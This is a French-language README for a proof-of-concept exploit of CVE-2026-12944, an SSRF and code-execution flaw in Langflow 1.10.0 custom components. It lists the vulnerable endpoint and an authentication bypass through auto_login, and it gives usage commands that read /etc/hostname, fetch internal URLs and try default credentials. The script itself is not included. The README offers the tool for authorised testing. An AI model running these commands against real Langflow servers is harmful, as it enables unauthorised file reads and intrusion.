
PoC Python exploitant CVE-2026-12944, une SSRF dans Langflow 1.10.0 via urllib dans les composants personnalisés, avec des capacités de lecture et de récupération authentifiées.
Langflow OSS (≤ 1.10.0) — vulnérabilité permettant l'exécution de code arbitraire via urllib.request / socket dans des composants personnalisés.
La liste de refus du scanner de composants ne couvrait pas ces modules de la bibliothèque standard. Corrigé dans la version 1.10.1 (IBM).
Sévérité : PR:L (Reproductible publiquement / Sévérité faible)
Point de terminaison d'exploitation : POST /api/v1/custom_component
Nécessite un cookie de session ou un jeton bearer.
--test — aucune authentification requise. Effectue uniquement un GET /api/v1/version public.--read / — s'authentifier d'abord :
--fetchGET /api/v1/auto_login. Si la réponse JSON contient access_token, envoyer Authorization: Bearer … (aucun nom d'utilisateur/mot de passe nécessaire).POST /api/v1/login en utilisant --uname / --password au format application/x-www-form-urlencoded.POST /api/v1/custom_component.--uname / --password ne sont utilisés que si l'auto-login est désactivé. Sur une installation standard par défaut, ils sont ignorés.
Pour tests autorisés uniquement. N'utilisez pas ceci contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test.
Prérequis : Python 3 (bibliothèque standard uniquement).
python3 cve-2026-12944-langflow-urllib-ssrf.py -u http://TARGET --test
python3 cve-2026-12944-langflow-urllib-ssrf.py -u http://TARGET --read /etc/hostname
python3 cve-2026-12944-langflow-urllib-ssrf.py -u http://TARGET --fetch http://127.0.0.1:7860/api/v1/version
python3 cve-2026-12944-langflow-urllib-ssrf.py -u https://TARGET --read /etc/hostname --insecure
python3 cve-2026-12944-langflow-urllib-ssrf.py -u TARGET --uname langflow --password langflow --read /etc/hostname
Rapport & PoC : ShadowForge Cyber